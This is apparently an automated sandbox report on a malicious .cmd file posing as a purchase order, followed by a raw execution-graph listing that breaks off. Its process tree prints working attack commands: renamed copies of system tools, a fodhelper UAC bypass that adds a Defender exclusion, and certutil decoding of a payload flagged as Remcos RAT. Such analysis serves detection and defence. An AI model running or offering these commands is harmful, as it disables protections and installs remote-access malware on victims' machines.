                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:21:55:54
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\xkn.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                                                                                                                  Imagebase:0x7ff7039f0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:21:55:57
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:21:55:58
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:21:55:59
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:21:55:59
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\ger.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                                                                                                                  Imagebase:0x7ff655880000
                                                                                                                  File size:77'312 bytes
                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:21:56:02
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\fodhelper.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                  Imagebase:0x7ff723760000
                                                                                                                  File size:49'664 bytes
                                                                                                                  MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:21:56:06
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\SystemSettingsAdminFlows.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                                                                                                                  Imagebase:0x7ff6f6b90000
                                                                                                                  File size:519'080 bytes
                                                                                                                  MD5 hash:5FA3EEF00388ED6344B4C35BA7CAA460
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:21:56:12
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:21:56:12
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                  Imagebase:0x7ff7050c0000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:21:56:13
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:21:56:13
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\kn.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                                                                                                                  Imagebase:0x7ff67de30000
                                                                                                                  File size:1'651'712 bytes
                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:21:56:14
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:21:56:14
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\kn.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                                                                                                                  Imagebase:0x7ff67de30000
                                                                                                                  File size:1'651'712 bytes
                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:21:56:15
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'465'344 bytes
                                                                                                                  MD5 hash:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:21:56:15
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:32
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:33
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:taskkill /F /IM SystemSettings.exe
                                                                                                                  Imagebase:0x7ff636950000
                                                                                                                  File size:101'376 bytes
                                                                                                                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:34
                                                                                                                  Start time:21:56:16
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\alpha.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
                                                                                                                  Imagebase:0x7ff789bc0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:35
                                                                                                                  Start time:21:56:23
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
                                                                                                                  Imagebase:0x1c0000
                                                                                                                  File size:29'184 bytes
                                                                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:36
                                                                                                                  Start time:21:56:35
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\Libraries\Kpeyvroh.PIF
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Libraries\Kpeyvroh.PIF"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'465'344 bytes
                                                                                                                  MD5 hash:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000024.00000002.2420298425.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:38
                                                                                                                  Start time:21:56:43
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Users\Public\Libraries\Kpeyvroh.PIF
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Libraries\Kpeyvroh.PIF"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'465'344 bytes
                                                                                                                  MD5 hash:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Yara matches:
                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000026.00000002.2505959580.0000000002841000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:5.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:32.1%
                                                                                                                    Total number of Nodes:1783
                                                                                                                    Total number of Limit Nodes:42
                                                                                                                    execution_graph 16806 7ff789bc6be0 16857 7ff789bccd90 16806->16857 16809 7ff789be41a2 16812 7ff789bc3278 166 API calls 16809->16812 16810 7ff789bc6c13 _pipe 16814 7ff789bc6c32 16810->16814 16843 7ff789bc6e26 16810->16843 16813 7ff789be41bc 16812->16813 16815 7ff789bee91c 198 API calls 16813->16815 16816 7ff789bc6df1 16814->16816 16863 7ff789bcaffc _dup 16814->16863 16817 7ff789be41c1 16815->16817 16820 7ff789bc3278 166 API calls 16817->16820 16819 7ff789bc6c7d 16819->16809 16865 7ff789bcb038 _dup2 16819->16865 16821 7ff789be41d2 16820->16821 16823 7ff789bee91c 198 API calls 16821->16823 16825 7ff789be41d7 16823->16825 16824 7ff789bc6c93 16824->16825 16867 7ff789bcd208 16824->16867 16826 7ff789bc3278 166 API calls 16825->16826 16828 7ff789be41e4 16826->16828 16830 7ff789bee91c 198 API calls 16828->16830 16829 7ff789bc6ca4 16871 7ff789bcbe00 16829->16871 16831 7ff789be41e9 16830->16831 16834 7ff789bc6ccf _get_osfhandle DuplicateHandle 16835 7ff789bc6d07 16834->16835 16836 7ff789bcb038 _dup2 16835->16836 16837 7ff789bc6d11 16836->16837 16837->16825 16838 7ff789bcd208 _close 16837->16838 16839 7ff789bc6d22 16838->16839 16840 7ff789bc6e21 16839->16840 16842 7ff789bcaffc _dup 16839->16842 16909 7ff789bee91c 16840->16909 16844 7ff789bc6d57 16842->16844 16912 7ff789bc3278 16843->16912 16844->16817 16845 7ff789bcb038 _dup2 16844->16845 16846 7ff789bc6d6c 16845->16846 16846->16825 16847 7ff789bcd208 _close 16846->16847 16848 7ff789bc6d7c 16847->16848 16849 7ff789bcbe00 647 API calls 16848->16849 16850 7ff789bc6d9c 16849->16850 16851 7ff789bcb038 _dup2 16850->16851 16852 7ff789bc6da8 16851->16852 16852->16825 16853 7ff789bcd208 _close 16852->16853 16854 7ff789bc6db9 16853->16854 16854->16840 16855 7ff789bc6dc1 16854->16855 16855->16816 16905 7ff789bc6e60 16855->16905 16858 7ff789bccda1 GetProcessHeap RtlAllocateHeap 16857->16858 16859 7ff789bdc84e 16857->16859 16858->16859 16860 7ff789bc6c04 16858->16860 16861 7ff789bc3278 164 API calls 16859->16861 16860->16809 16860->16810 16862 7ff789bdc858 16861->16862 16864 7ff789bcb018 16863->16864 16864->16819 16866 7ff789bcb061 16865->16866 16866->16824 16868 7ff789bcd211 16867->16868 16870 7ff789bcd246 16867->16870 16869 7ff789bcd238 _close 16868->16869 16868->16870 16869->16870 16870->16829 16872 7ff789bc6cc4 16871->16872 16873 7ff789bcbe1b 16871->16873 16872->16834 16872->16835 16873->16872 16874 7ff789bcbe67 16873->16874 16875 7ff789bcbe47 memset 16873->16875 16877 7ff789bcbe73 16874->16877 16878 7ff789bcbf29 16874->16878 16895 7ff789bcbeaf 16874->16895 16988 7ff789bcbff0 16875->16988 16879 7ff789bcbe92 16877->16879 16883 7ff789bcbf0c 16877->16883 16880 7ff789bccd90 166 API calls 16878->16880 16881 7ff789bcbea1 16879->16881 16915 7ff789bcc620 GetConsoleTitleW 16879->16915 16887 7ff789bcbf33 16880->16887 16881->16895 17026 7ff789bcaf98 16881->17026 17031 7ff789bcb0d8 memset 16883->17031 16885 7ff789bcbff0 185 API calls 16885->16872 16888 7ff789bcbf70 16887->16888 16887->16895 17091 